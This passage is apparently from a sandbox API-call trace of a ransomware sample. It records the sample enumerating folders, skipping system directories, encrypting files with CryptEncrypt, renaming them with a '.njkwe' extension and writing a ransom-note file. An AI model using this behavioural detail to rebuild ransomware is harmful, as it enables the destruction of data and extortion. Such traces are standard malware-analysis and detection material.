lstrcmpiW (lpString1="1036", lpString2="$Recycle.bin") returned 1 [0061.125] lstrcmpiW (lpString1="1036", lpString2="System Volume Information") returned -1 [0061.126] lstrcmpiW (lpString1="1036", lpString2="Program Files") returned -1 [0061.126] lstrcmpiW (lpString1="1036", lpString2="Program Files (x86)") returned -1 [0061.126] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036") returned 30 [0061.126] lstrcmpW (lpString1="1036", lpString2=".") returned 1 [0061.126] lstrcmpW (lpString1="1036", lpString2="..") returned 1 [0061.126] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.126] GetProcessHeap () returned 0xbe0000 [0061.126] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.126] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\*") returned 32 [0061.126] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a320 [0061.126] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.126] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.126] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.126] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.126] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.126] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\.") returned 32 [0061.127] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.127] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.127] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.127] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.127] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.127] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.127] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.127] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\..") returned 33 [0061.127] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.127] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.127] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.127] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.127] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.127] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.127] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.127] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.127] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 39 [0061.127] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.127] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.127] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.127] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.127] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.139] GetTickCount () returned 0x114fb68 [0061.139] GetTickCount () returned 0x114fb68 [0061.139] GetTickCount () returned 0x114fb68 [0061.139] GetTickCount () returned 0x114fb68 [0061.140] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.140] GetProcessHeap () returned 0xbe0000 [0061.140] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.140] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xdc6, lpOverlapped=0x0) returned 1 [0061.142] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff23a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.142] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xdc6, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xdc6, lpOverlapped=0x0) returned 1 [0061.142] GetProcessHeap () returned 0xbe0000 [0061.142] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.142] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.142] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.142] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.143] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.143] CloseHandle (hObject=0x42c) returned 1 [0061.144] GetProcessHeap () returned 0xbe0000 [0061.144] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.144] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.146] GetProcessHeap () returned 0xbe0000 [0061.146] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.146] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.146] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 48 [0061.146] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.146] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.146] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.146] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.146] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.146] GetTickCount () returned 0x114fb78 [0061.146] GetTickCount () returned 0x114fb78 [0061.146] GetTickCount () returned 0x114fb78 [0061.146] GetTickCount () returned 0x114fb78 [0061.147] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.147] GetProcessHeap () returned 0xbe0000 [0061.147] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.147] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.149] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.149] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.149] GetProcessHeap () returned 0xbe0000 [0061.149] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.149] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.149] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.149] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.149] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.149] CloseHandle (hObject=0x42c) returned 1 [0061.152] GetProcessHeap () returned 0xbe0000 [0061.152] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.152] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.152] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.152] GetProcessHeap () returned 0xbe0000 [0061.152] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.152] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.152] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.152] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.152] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.152] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.152] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.152] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 49 [0061.152] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.152] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.152] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.152] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.152] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.153] GetTickCount () returned 0x114fb78 [0061.153] GetTickCount () returned 0x114fb78 [0061.153] GetTickCount () returned 0x114fb78 [0061.153] GetTickCount () returned 0x114fb78 [0061.153] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.153] GetProcessHeap () returned 0xbe0000 [0061.153] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.153] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.163] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.163] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.163] GetProcessHeap () returned 0xbe0000 [0061.163] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.163] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.163] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.163] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.163] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.164] CloseHandle (hObject=0x42c) returned 1 [0061.165] GetProcessHeap () returned 0xbe0000 [0061.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.165] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.165] GetProcessHeap () returned 0xbe0000 [0061.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.165] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.165] FindClose (in: hFindFile=0xc1a320 | out: hFindFile=0xc1a320) returned 1 [0061.165] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.165] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1036\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.166] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.167] CloseHandle (hObject=0x428) returned 1 [0061.167] GetProcessHeap () returned 0xbe0000 [0061.167] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.167] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1037", cAlternateFileName="")) returned 1 [0061.167] lstrcmpiW (lpString1="1037", lpString2="Windows") returned -1 [0061.167] lstrcmpiW (lpString1="1037", lpString2="$Recycle.bin") returned 1 [0061.167] lstrcmpiW (lpString1="1037", lpString2="System Volume Information") returned -1 [0061.167] lstrcmpiW (lpString1="1037", lpString2="Program Files") returned -1 [0061.167] lstrcmpiW (lpString1="1037", lpString2="Program Files (x86)") returned -1 [0061.167] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037") returned 30 [0061.167] lstrcmpW (lpString1="1037", lpString2=".") returned 1 [0061.168] lstrcmpW (lpString1="1037", lpString2="..") returned 1 [0061.168] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.168] GetProcessHeap () returned 0xbe0000 [0061.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.168] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\*") returned 32 [0061.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a160 [0061.208] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.208] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.208] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.208] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.208] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.208] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\.") returned 32 [0061.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.208] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.208] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.208] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.208] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.208] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.208] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.208] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\..") returned 33 [0061.208] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.208] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.208] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.208] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.208] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.208] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.208] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.208] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 39 [0061.208] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.208] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.208] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.208] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf", 